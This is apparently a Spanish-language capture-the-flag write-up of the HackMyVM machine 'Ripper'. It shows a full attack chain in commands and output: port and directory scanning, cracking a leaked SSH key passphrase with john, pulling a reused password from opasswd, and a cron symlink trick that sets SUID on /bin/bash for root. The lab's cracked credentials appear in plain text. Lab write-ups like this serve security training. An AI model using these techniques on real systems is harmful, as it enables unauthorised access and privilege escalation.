cd ~/blog

~/writeups/hmv/087-ripper.md

087 - Ripper

easy Linux hmv 27-04-2024
Exposed id_rsa.bak + passphrase crackingCredential disclosure (linpeas / opasswd)Cron symlink race (chmod +s)
hackmyvm.eu/machines/machine.php?vm=Ripper

~1 min de lectura


Enumeramos puertos:

 sudo nmap -p- -sS -n -Pn -oG 01-allPorts 192.168.1.28
 nmap -sCV -p22,80 -oN 02-targeted.txt 192.168.1.28
Starting Nmap 7.94 ( https://nmap.org ) at 2024-04-27 22:51 -04
Nmap scan report for 192.168.1.28
Host is up (0.00030s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 0c:3f:13:54:6e:6e:e6:56:d2:91:eb:ad:95:36:c6:8d (RSA)
|   256 9b:e6:8e:14:39:7a:17:a3:80:88:cd:77:2e:c3:3b:1a (ECDSA)
|_  256 85:5a:05:2a:4b:c0:b2:36:ea:8a:e2:8a:b2:ef:bc:df (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.48 seconds

Enumeramos y un staff_statements.txt da la pista de "antiguos archivos de conexión SSH":

 cat staff_statements.txt
The site is not yet repaired. Technicians are working on it by connecting with old ssh connection files.

Buscando archivos de respaldo encontramos un id_rsa.bak:

 gobuster dir -u 'http://192.168.1.28' -w ~/Documentos/wordlists/SecLists/Discovery/Web-Content/common.txt -x php,txt,html,bak -r
...
/id_rsa.bak           (Status: 200) [Size: 1876]
...

Crackeamos su passphrase con john:

 /opt/john/run/ssh2john.py id_rsa > hash
 /opt/john/run/john -w=/home/wh01s17/Documentos/wordlists/rockyou.txt hash
...
bananas          (id_rsa)
...

El usuario lo deducimos de la máquina (jack) y entramos por SSH:

 ssh jack@192.168.1.28 -i id_rsa
Enter passphrase for key 'id_rsa': bananas
jack@ripper:~$

Ejecutamos linpeas, que recupera una contraseña del opasswd, válida para jack y helder:

...
═╣ Can I read opasswd file? ............. jack:Il0V3lipt0n1c3t3a
...

jack@ripper:/tmp$ su helder
Password: Il0V3lipt0n1c3t3a
helder@ripper:/tmp$

Obtenemos la primera flag. Con pspy64 detectamos un cronjob de root complejo:

...
2024/04/28 20:02:01 CMD: UID=0     PID=19380  | /bin/sh -c nc -vv -q 1 localhost 10000 > /root/.local/out && if [ "$(cat /root/.local/helder.txt)" = "$(cat /home/helder/passwd.txt)" ] ; then chmod +s "/usr/bin/$(cat /root/.local/out)" ; fi
...

El cron compara /root/.local/helder.txt con /home/helder/passwd.txt y, si coinciden, asigna SUID a /usr/bin/<lo recibido por nc>. Creamos un symlink para que la comparación coincida y respondemos por nc con bash para que se aplique SUID a /bin/bash:

helder@ripper:/tmp$ ln -s /root/.local/helder.txt /home/helder/passwd.txt
helder@ripper:/tmp$ echo "bash" > /tmp/root
helder@ripper:/tmp$ nc -lvnp 10000 < root
listening on [any] 10000 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 37344
helder@ripper:/tmp$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1168776 Apr 18  2019 /bin/bash

helder@ripper:/tmp$ bash -p
helder@ripper:/tmp$ id
uid=1001(helder) gid=1001(helder) euid=0(root) egid=0(root) groups=0(root),1001(helder)

Obtenemos nuestra flag.

Fin.

Machine rooted ✓

user & root flags capturados — redactados en el sitio público

// relacionados